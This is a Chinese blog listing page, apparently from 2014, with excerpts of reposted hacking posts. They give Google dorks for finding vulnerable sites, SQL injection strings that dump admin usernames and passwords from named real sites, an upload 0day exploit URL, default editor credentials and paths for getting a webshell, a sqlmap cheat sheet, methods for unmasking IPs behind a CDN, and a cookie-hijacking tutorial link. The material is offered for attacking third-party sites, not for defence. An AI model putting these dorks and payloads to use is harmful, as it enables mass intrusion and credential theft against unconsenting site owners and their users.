- 博客(16)
- 收藏
- 关注
RSS订阅转载 某版本JEECMS后台存在通用struts2命令执行漏洞。
某版本JEECMS后台存在通用struts2命令执行漏洞。可通过谷歌搜索关键字inurl:login/jeecms.do,可获得多个存在st2的漏洞网站该版本为jeecmsV2.x版本,漏洞系struts2框架自带的一个安全漏洞,由于jeecms在2010年开始停止了对jeecmsV2.X版本的维护,并建议广大用户统一升级到jeecms最新版本,估计还有很多用户至今未升级,在此,我
2014-12-25 09:47:18
1596
转载 学校渗透系统
今天日站发现了一个 0day 学校的 这是一个任意上传漏洞 不用后台权限 本地搭建上传 成功得到一个shell 这个系统还有编辑器上传不重命名的 可以利用iis6的解析漏洞 服务器是内网的 我没去进一步渗透 附上exp: http://www.qiaocui.net/AjaxFileHandler.ashx?random=0.2077032807
2014-12-25 09:45:59
1412
转载 sqlmap使用技巧大全
常见参数:-u #注入点-f #指纹判别数据库类型-b #获取数据库版本信息-p #指定可测试的参数(?page=1&id=2 -p “page,id”)-D “” #指定数据库名-T “” #指定表名-C “” #指定字段Options(选项):--version #显示程序的版本号并退出-h, --help #显示
2014-12-25 09:44:11
630
转载 越南批量oday
关键字:site:.vn inurl:detail.asp?fold=漏洞页面:/admin/FCKeditor/_samples/default.html/FCKeditor/_samples/default.html/admin/admin_upload.asp利用方法:
2014-12-25 09:43:29
1016
转载 如何查询使用了CDN的网站的真实IP
使用了 CDN的网站,如何查询他的真实IP地址,文章内容来源(核攻击的博客)。1:先查一下分站的IP,很多情况是主站使用了 CDN 而分站没有使用。类似这样 www.code521.com 使用了CDN ,那么 mail.code521.com blog.code521.com 等二级域名可能没有使用CDN,对于这种情况可以通过查询二级域名来获得真实的IP地址,值得注意的是 通过二级域
2014-12-25 09:43:08
3220
转载 shopxp网上购物系统 v7.4 爆密码0day
漏洞版本:shopxp网上购物系统 v7.4 关键词:inurl:shopxp_news.aspshopxp_news.asp暴密码的语句:/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,
2014-12-25 09:42:28
1357
转载 国外某程序可批量可注入!
inurl:news_detail.asp?newID=EXP语句+union+select+1,2,3,username,5,password,7,8,9,10,11,12,13,14+from+Admins测试实列http://www.bi-ka.org/news_detail.asp?newID=107+union+select+1,2,3,usern
2014-12-25 09:42:02
397
转载 kuwebs漏洞整理
EXP: www.cnseay.com 把www.cnseay.com/admin1修改成网站后台地址,点击登陆即可。当然绕过的方法不止这些,还有比如覆盖数据库连接字符的等等。 修复:不多说。。。 八、任意文件上
2014-12-25 09:41:29
829
原创 总结网站渗透的步骤
首先吧,主站入手注册一个账号,看下上传点,等等之类的。用google找下注入点,格式是Site:XXX.com inurl:asp|php|aspx|jsp最好不要带 www,因为不带的话可以检测二级域名。扫目录,看编辑器和Fckeditor,看下敏感目录,有没有目录遍及,查下是iis6,iis5.iis7,这些都有不同的利用方法Iis6解析漏洞
2014-12-25 09:40:35
896
翻译 传信网络独立开发网站源码0day漏洞
后台system/login.asp进了后台有个ewebeditorGoogle 搜索inurl:product1.asp?tyc=编辑器漏洞默认后台ubbcode/admin_login.asp数据库ubbcode/db/ewebeditor.mdb默认账号密码yzm 111111拿webshell方法登陆后台点击“样式管理”-选择新增样式
2014-12-25 09:39:53
585
转载 某信息技术考试系统编辑器漏洞可getshell
谷歌搜索 intitle:信息技术教学辅助平台3.0 然后丢进御剑,扫出来fck编辑器界面,然后自己解决 别谢我,请叫我雷锋~
2014-12-25 09:38:38
843
转载 谷歌关键字一枚
google关键字:inurl:product_show.asp?action=common 数据库地址:db/%23ruiutend%26anxiu.mdb 上传地址:manage/admin_flash.asp 上传后目录:uploadfiles/ProductImages/2014-1/PA20141
2014-12-25 09:37:34
465
原创 (原创)kali linux下劫持百度和QQ空间cookie
链接:http://pan.baidu.com/s/1nt1GCbR 密码:dets
2014-12-25 09:27:56
1493
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人